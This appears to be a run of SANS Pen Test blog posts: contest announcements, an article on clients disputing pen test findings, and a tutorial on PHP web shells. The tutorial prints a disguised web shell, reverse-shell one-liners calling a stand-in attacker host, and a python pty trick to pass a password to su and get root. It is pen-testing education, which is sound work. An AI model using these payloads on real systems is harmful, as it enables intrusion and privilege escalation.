SANS Pen Test Hackfest Twitter Contest

We’re delighted to announce a new Twitter-based contest here with a fantastic prize.  And, participating in this one is really easy.  Check it out.

On November 13 through 20, SANS will be running our second annual Pen Test Hackfest training event in Washington DC.  We throw everything we’ve got into this extra special event, including:

  • Two days of amazing, in-depth talks by leading minds of the industry, including the authors of some of the best pen test tools on the planet, such as SET, Armitage, and more.
  • Six days of training, with five different classes to choose from.
  • Three nights of NetWars Tournament challenges for hands-on fun and learning.
  • One night of CyberCity missions, where you’ll be defending critical infrastructures against attacks, preventing city-wide mayhem.
  • Coin-a-palooza: A chance to earn up to FOUR SANS Pen Test coins for your collection.
  • One Super Secret Special Evening: On Nov 14, we’ll be taking a mind-blowing trip.

The prize for our new Twitter contest is free admission to the two-day session at the start of the Hackfest on Nov 13-14.  You’ll experience some great talks, learn super useful information, participate in a NetWars evening Nov 13, and join us on the Super Secret Special Evening Nov 14.

How do you enter?  It’s easy — just snap a picture of yourself with one of the items listed below and tweet the photo to  @pentesttips  with the hashtag  #SANSHackfest.  Contest runs August 1st – 15th, 2014:

– Photo of yourself holding a SANS Pen Test Challenge Coin (Just the front!!! Not the back with its sooper sekret cipher) or Coin Sticker
– Photo of yourself wearing a SANS Pen Test T-shirt or NetWars shirt
– Photo of yourself wearing the glowing NetWars T-shirts from last year’s SANS Pen Test Hackfest
– Photo of yourself with any SANS item (book, shirt, etc.)
– Photo of yourself with this SANS pen test website visible (in a browser, on a screen, or even printed out on paper)

Each person that tweets a photo will be entered into a drawing to win a FREE seat at the Pen Test Hackfest Summit Nov 13-14.  The contest ends on August 15th, 2014 and we will announce the winner on August 18, 2014. The more creative the photo, the better…anything goes, just keep it clean and family friendly.  Some more detailed rules follow below.

Have fun & good luck!

–Ed Skoudis.

Rules:
1. Entry: Contest begins on Friday, August 1st, 2014 and ends Friday, August 15th, 2014. Responses must be submitted by 9:00 pm EDT on August 15th.  Each participant may enter an arbitrary number of times for the challenge.

2. Prize: Each person that correctly submits a photo including the hashtag #SANSHackfest will be entered into a drawing to win a FREE seat at the Pen Test Hackfest Summit this November. SANS will choose only one winner.  The seat is transferable to another in the same organization/company. The winner will be chosen on August 18th and will be notified via Twitter.

3. Odds of Winning: The odds of winning the contest depend upon the total number of all eligible entries received in the contest period, regardless of method of participation.

4. Release of Liability: SANS is not responsible for lost, late, or unintelligible entries, lost connections, miscommunications, failed transmissions, other technical difficulties or failures.

Announcing the Awesome New SANS Brochure Challenge

Here’s some fun news.  SANS just released a new kind of challenge – one that unfolds from the pages of a SANS brochure itself.  Created by Jeff McJunkin and a group of challenge-writing collaborators, it launched this week with the mailing of the SANS Network Security brochure for the upcoming conference in Las Vegas in October 2014.  This challenge will take you across many domains of knowledge, including (but not limited to!): infosec fundamentals, pen testing, digital forensics, steganography, social media, mobile devices, and much, much more, all wrapped up in some geeky fun!

You’ll enjoy all these areas and more from the comfort of your brochure (paper or pdf) and local computer, along with everyone’s favorite global network, the Internet itself. You’ll be able to advance all the way through this challenge from anywhere in the world. If this sounds a bit overwhelming, don’t worry!  We recommend you start on the challenge now, and have fun with it.

Regardless of whether you can make it to the conference in Vegas or not, you can still participate in the challenge and win prizes by working from the brochures or their pdfs.  If you receive SANS brochures in the mail, be on the lookout for the Network Security brochure this week; the challenge details are on Page 2.  Or, skip the paper altogether and jump into sleuthing and hacking your way through the challenge by downloading the Network Security brochure.  The challenge starts on Page 2 in the section cleverly titled “SANS Brochure Challenge.”

Once you conquer the first challenge in the Network Security brochure, you’ll see other challenge components in the SANS Albuquerque brochure (shipped the week of 7/10/14, but downloadable here now), the SANS Baltimore brochure (shipped the week of 7/31/14, but downloadable here now), and the SANS Seattle brochure (shipped the week of 8/14/14, but downloadable here now) over the next few weeks.  We’ll post reminders about those brochures in this blog when they hit the mail as well.  You can get rolling and make some huge progress based on what’s in the Network Security (Vegas) brochure alone.

So, how can you win and earn the undying respect of all your friends? There are three ways to win, though for each of them you’ll need to finish the challenge. We’ll award prizes to the first person to complete the challenge, the person with the best technical write-up describing how they did it, and one lucky person who wins a random draw from all entries.

This innovative, quirky, and fun challenge itself will tell you where to send your answer when you conquer it!

What will you win?

The person with the best technical write-up will receive a signed copy of  the “Counter Hack Reloaded” book, as will the winner of the random drawing.  We’ll also tell everyone about your amazing work as a victor in this challenge!  And, the first person to finish the challenge will receive the GRAND PRIZE – a free four-month subscription to NetWars Continuous, valued at over $2,000! You’ll have plenty of opportunities to develop your skills practicing in this on-line cyber range, especially with our NetWars Continuous automated hint system to ensure a Stuck-Free™ experience!

Rules of Engagement for the brochure challenge:

  • No denial of service attacks
  • No brute force attacks – although you won’t gain access in this way, you could slow down the experience for other players
  • No attacks against the web servers or their underlying operating systems
  • No sharing of challenge links, hints, or write-ups before the contest deadline has passed

Have fun with SANS’ first ever official brochure challenge!

–Jeff McJunkin, Ed Skoudis, and the SANS Team

Dealing with the Many Stages of Pen Test Result Grief – Part 2

By Ed Skoudis

In this series of articles, we’re looking at some of the grief that penetration testers often encounter when they deliver their results and recommendations.  Our premise?  You, a great pen tester, work your tail off to conduct a wonderful, high-value, technically awesome pen test.  The result?  Target system personnel vomit all over your findings, push back on your recommendations, and just plain don’t see the value of what you’ve done.  The series, which began with article one here, focuses on practical tips you can use to avoid such situations up front, or, if they do occur later on, methods for defusing the situation and demonstrating the real value you are providing.

Article 1 in the series sets the backdrop and talks about Stage 1: Denial and Stage 2: We Meant to Do It That Way.  Here in article 2, we’ll pick up where we left off by exploring Stage 3: The Blame Game (Blame the Messenger) and Stage 4: That’s Not FAIR!

Stage 3: The Blame Game (Blame the Messenger)

Target System Personnel Reviewing the Report: “You’ve actually caused the issue at hand by running your freaky-deaky ultra-scary hacking tools.  Something like that would never happen in a real-world attack.”

This complaint sometimes comes from target system personnel not understanding how widespread and common hacking tools are today and the value they can provide in actually improving security.  You can hardly blame them.  For some people outside of the information security community, hacking tools are mysterious, edgy, voodoo magick.  Compounding the problem, many penetration test reports reinforce the voodoo magick misperception, because they don’t go into any details about how the tools found or exploited the flaw.  In my work reviewing pen test reports, I see a lot of deliverables that blurt out critical findings as though they just fell out of the sky, with little information for target system personnel to understand the true nature of the risk they face.

To head this one off in advance, you as the penetration tester should try to help educate target system personnel by including some relatively small but very important details in your report.  Make sure your report includes the names of the tools you used during the test for each finding.  Also, for particularly critical findings, explain at a high level the underlying technique your tool used to discover the finding, along with how commonly that technique is applied in the wild.  Explain how real-world attackers use the same or similar tools to exploit these kinds of flaws every day.  Your goal is to make the critical issues you’ve discovered real to your report readers, tying them to real-world threats.  These small tweaks to your report will not only help inform target system personnel about the validity of your findings, they will also help them better understand what they are up against in defending their environments.

That’s one form of the Blame Game that pen testers may encounter.  We’ll see another variation of the Blame Game in a follow-up article in this series, where target system personnel blame not the pen testers, but another organization or entity outside their control.

Stage 4: That’s Not FAIR!

Target System Personnel Reviewing the Report: “Well, well, well… Sure you can come up with such findings if you cheat. The only way someone could discover such a flaw is by utilizing some super secret inside knowledge, which we gave you in good faith at the outset of the pen test before you betrayed us, Benedict Arnold.  No real bad guy would ever be able to figure that out and mount such an attack.”

Here’s a classic response that comes up surprisingly often.  During the initial scoping of the project or during project update debriefings, target system personnel will almost always share information that proves extremely useful in finding juicy flaws during your penetration test.  They might mention an architectural problem, a broken process, a particularly weak system, or more, allowing you to find and exploit the crap out of the target environment.  When you report on your results, sometimes target system personnel turn on you and say, “That’s not FAIR!”

To deal with this, I always start a project by talking with target system security and operations personnel trying to defuse an inherent conflict.  You see, target system personnel sometimes fear pen testers (as they worry that we may accidentally break something like a bull in a china shop), and other times they just plain loathe us (as we look through their work to find flaws which could get them in trouble).  This mix of fear and loathing can make for… er… rather complex emotions during the test, to put it lightly.  At the outset of a project, I usually say in a nice way, “Look, we both have the same goal – to help improve the organization’s security and its operations.  Let’s work together to make that happen.”

I go even further, saying, “You know this environment better than I ever will… I’m sure there are some things you know that would help improve security, but you haven’t been able to get management to invest the resources needed to do so.  Use me.  I can be a vehicle by which you can move your organization to improving its security stance, if we work together.”  It’s a sincere pledge on my part, and being explicit about it up front can help you identify important issues early on during a project.  You are planting the seeds for a good working relationship with target system personnel so that you don’t find yourself with a “That’s Not FAIR” claim.

Then, of course, when you write up the report, you should point out those issues that were identified during the beginning of the project, emphasizing the importance of the issues and their associated defenses.  Only mention that you learned of the issues from the in-house team if the individuals on that team have agreed to such a mention.  You also have to show, in your report, how a real-world bad guy could find and exploit the security issue that was, for your pen test, kind of a “gimme” by target system personnel.  Help them to understand how real-world attackers working over months may find this same issue, which you modeled in your penetration test over the course of a week or two.

Even if you do all of this flawlessly, you may still hear a cry of “That’s Not FAIR!”  If this happens to you, remember to keep calm and never get your back up.  You are in the right, as long as you’ve stayed within scope, followed your rules of engagement, and utilized real-world attack techniques.

Here’s what I like to do when this occurs: When someone claims, “That’s Not FAIR,” I translate it in real time, in my head, using an internal voice that sounds like a bad voice-over from an old kung fu movie, to: “You have bested me with your impressive kung fu, and I congratulate you on your success. Please help me understand how you have done this great feat so that I can improve the security of my enterprise.”  Yeah, it’s a bit of a wordy replacement for “That’s Not FAIR,” but it helps me smile instead of reacting negatively.  You can then proceed calmly to explain how a real-world attacker would find the associated issue using publicly available tools and information, along with your recommendations to help improve the organization’s security stance.

So, that’s Stage 3 and 4.  In part 3 of this series, we’ll discuss some tips to use when dealing with Stage 5 (“I don’t think that finding means what you think it means”) and Stage 6 (“Scope-a-Dope”).  Please stay tuned.

In the meantime, if you are interested in all things penetration test related, I’d love to see you take the SANS Security 560 course from me.

–Ed Skoudis
SANS Institute Fellow
SANS Penetration Testing Curriculum Lead
Author and Instructor, SANS Security 560: Network Pen Testing & Ethical Hacking

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive role-playing-style video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen

Sneaky Stealthy SU in (Web) Shells

[In this article, the inimitable Tim Medin has some fun with PHP web shells, and merges together some clever ideas for interacting with them in a rather stealthier fashion using some Python kung fu! –Ed.]

By: Tim Medin

Here is the scenario: you have a server that allows you to upload an avatar. The site makes sure that the file ends with .jpg, .png, or .gif. Being the sneaky bugger you are (as a professional penetration tester operating within your scope and rules of engagement, naturally), you upload a file named shell.php.jpg, containing this delightful gem:

<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

This file passes the extension check, but because the filename contains .php, some web servers will still hand it to the PHP interpreter.  Apache, for example, treats every dotted part of a filename as an extension, so a handler mapped with AddHandler for .php fires on shell.php.jpg unless the handler is restricted with a FilesMatch rule anchored to the end of the filename.  Also, this shell doesn’t include the telltale “/bin/sh”, “shell_exec”, or “system” strings; to the untrained eye it looks like a couple of time-related system calls.

$ curl "http://Site/shell.php.jpg?ctime=system&atime=whoami"
apache
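The upload check described above, side by side with a hardened version, as an added example that is not part of the original article.  The first function is the weak final-extension test the article bypasses; handler_extensions shows why Apache’s multi-extension handling makes shell.php.jpg dangerous; accept_upload is one way to tighten the check (exactly one extension, a whitelist, magic bytes that match the claimed type, and a server-chosen storage name).  The sample file contents and the extension sets are constructed for the example; the set of script extensions is an assumption about what a given server maps to interpreters.

```python
import os
import secrets

# Assumed whitelist for the avatar feature, with the magic bytes each type must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions an Apache AddHandler mapping would hand to an interpreter no matter
# where they appear in the name (assumed list; adjust to the server's real config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "py", "cgi", "sh"}

# Constructed sample contents: the article's shell, and minimal image headers.
PHP_SHELL = b"<?php @extract($_REQUEST); @die ($ctime($atime)); ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def weak_allows(filename):
    """The check from the article: only the final extension is inspected."""
    return filename.lower().endswith((".jpg", ".png", ".gif"))


def handler_extensions(filename):
    """Every script extension Apache-style multi-extension handling would act on."""
    parts = os.path.basename(filename).lower().split(".")[1:]
    return {p for p in parts if p in SCRIPT_EXTS}


def accept_upload(filename, content):
    """Return a server-chosen storage name, or None if the upload is rejected."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not all(parts):
        return None  # "shell.php.jpg" has two extensions; ".jpg" has no base name
    ext = parts[1]
    if ext not in ALLOWED:
        return None  # whitelist only; anything else is refused
    if not content.startswith(ALLOWED[ext]):
        return None  # claimed type does not match the magic bytes
    # Never reuse the attacker-supplied name; the server picks a random one.
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    print("weak check accepts shell.php.jpg:", weak_allows("shell.php.jpg"))
    print("apache would execute via:", handler_extensions("shell.php.jpg"))
    print("strict check on shell.php.jpg:", accept_upload("shell.php.jpg", PHP_SHELL))
    print("strict check on avatar.png:", accept_upload("avatar.png", PNG_SAMPLE))
```

Magic bytes alone do not stop a polyglot (a valid JPEG header followed by PHP code), which is why the storage name is generated by the server with a single image extension, and why the upload directory should additionally have script handlers disabled so nothing in it can be executed regardless of its name.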

This is by no means a new attack. The oldest reference I could find (in my vast two minutes of searching the deep web) is from 2009, but the technique/attack is much older. Now that we have a shell (via web shell or command injection) on a Linux target, let’s look at how we can escalate privileges. A common next step is to establish a netcat session back to the attacker’s system.

http://Site/shell.php.jpg?ctime=system&atime=nc+-nv+my.attack.er.ip+80+-e+/bin/sh

Or, if the target’s netcat doesn’t support -e (a compile-time option referred to as GAPING_SECURITY_HOLE), you could use the version below (as Ed Skoudis discovered at his Magical Olive Garden and documented here):

http://Site/shell.php.jpg?ctime=system&atime=mknod+/tmp/mypipe+p;+/bin/sh+</tmp/mypipe+|+nc+my.attack.er.ip+80+>/tmp/mypipe

Once we have the shell established, we need to upgrade it before we can use “sudo” or “su”, because both read the password from a terminal rather than from a plain pipe. Sterling Thomas posted an excellent list of upgrade techniques to the SANS GPWN mailing list. Once we use one of these techniques, we can use “sudo” and “su”.

What if you can’t or don’t want to have that outbound connection back to your box but you want to upgrade your shell in-line with your webshell? Sending the commands in HTTP POST requests is much stealthier: a default web server access log records the request line but not the POST body, so the commands never appear in it, and there isn’t that pesky outbound connection we saw with netcat. (The request for shell.php.jpg itself is still logged, and an inline proxy or WAF that captures request bodies will see everything.) Simple commands work fine this way.

$ curl "http://Site/shell.php.jpg" --data "ctime=system&atime=ls+-la"

We can send commands to the server, but we likely can’t use “sudo” as the web server’s account (such as apache) shouldn’t be in the /etc/sudoers file. This means we need to use “su” to upgrade. The “su” command has a “-c” option that allows us to specify a command. However, we have a problem — we need to run “su” and provide a password. What happens if we use echo to send the password into “su”? Let’s test it with our own shell.

$ echo password | su -c whoami
standard in must be a tty

Bah!  Depending on the su implementation you might instead get “must be run from a terminal”, but either way we are out of luck with this technique.  The su command insists on reading the password from a terminal, not from whatever we pipe into its Standard Input.

Now, here comes the trick. Python’s pty module can spawn a command on a pseudo-terminal, so su sees a real TTY on its standard input while we keep feeding it from our non-terminal shell.  Watch this:

$ (sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"
root

BOOM!!

We need the sleep to give python time to start and spawn “su” before the password arrives. A second later (Python should be ready by then) the password is written to the pseudo-terminal, su accepts it, and we “got root”. We can now run whatever we want, as root.

We can use this technique to brute force the root password too, though each failed attempt is typically logged to the auth log and delayed by PAM, so it is neither fast nor quiet. Of course, this method would also work with command injection.
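The pseudo-terminal trick above, written out as an added example (not the article’s code) that drives a TTY-requiring program with pty.fork instead of guessing a sleep: it reads from the master side until the password prompt appears, then types the password.  Because running the real su needs root and a real password, the block spawns a constructed stand-in that behaves like the article describes (refuses a non-TTY stdin with “standard in must be a tty”, reads the password from the controlling terminal, prints root on success, fails otherwise).  The stand-in, its password, and the prompt string are assumptions for the example; against a real target you would pass ['/bin/su', '-c', 'whoami'] as the argv.

```python
import os
import pty
import select
import subprocess
import sys

# Constructed stand-in for "su -c whoami" so the example runs without root.
# It mirrors su's behaviour: non-TTY stdin is refused, the password is read
# from the controlling terminal (getpass opens /dev/tty), success prints "root".
FAKE_SU = r'''
import getpass, os, sys
if not os.isatty(0):
    sys.stderr.write("standard in must be a tty\n")
    sys.exit(1)
pw = getpass.getpass("Password: ")
if pw != "password":
    sys.stderr.write("su: Authentication failure\n")
    sys.exit(1)
print("root")
'''
SU_ARGV = [sys.executable, "-c", FAKE_SU]  # assumed; real use: ['/bin/su', '-c', 'whoami']


def run_on_pipe(argv, password):
    """The failing approach: echo password | su -c whoami (stdin is a pipe, not a TTY)."""
    p = subprocess.run(argv, input=password + "\n", capture_output=True, text=True)
    return p.returncode, (p.stdout + p.stderr).strip()


def run_on_pty(argv, password, prompt=b"Password:", timeout=5.0):
    """Spawn argv on a pseudo-terminal, wait for the prompt, then type the password.

    Returns (exit code, everything the child wrote to the terminal).
    """
    pid, fd = pty.fork()
    if pid == 0:
        os.execvp(argv[0], argv)  # child: its stdin/stdout/stderr are the pty slave
    buf = b""
    answered = False
    try:
        while True:
            readable, _, _ = select.select([fd], [], [], timeout)
            if not readable:
                break  # child went quiet; stop waiting
            try:
                chunk = os.read(fd, 1024)
            except OSError:
                break  # Linux raises EIO once the slave side is closed
            if not chunk:
                break  # other platforms report EOF instead
            buf += chunk
            if not answered and prompt in buf:
                os.write(fd, password.encode() + b"\n")  # "type" the password at the TTY
                answered = True
    finally:
        os.close(fd)
    _, status = os.waitpid(pid, 0)
    code = os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1
    return code, buf.decode(errors="replace")


if __name__ == "__main__":
    print("pipe:", run_on_pipe(SU_ARGV, "password"))
    print("pty: ", run_on_pty(SU_ARGV, "password"))
    print("pty, wrong password:", run_on_pty(SU_ARGV, "wrong"))
```

Waiting for the prompt rather than sleeping removes the timing guess; the wrong-password call shows the failure path a brute-force loop would exercise, one attempt at a time, with each failure visible to whatever the target logs.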

Now we can stay stealthier and have more access, two things I very much love!

Many of the concepts and techniques we discuss here are covered in detail in the SANS flagship penetration testing course, SANS Security 560: Network Penetration Testing and Ethical Hacking, which covers end-to-end pen testing in depth with tons of hands-on labs.  Upcoming sessions include Boston in late July, Virginia Beach in late August, and Bangkok in August!

–Tim Medin
Counter Hack
@timmedin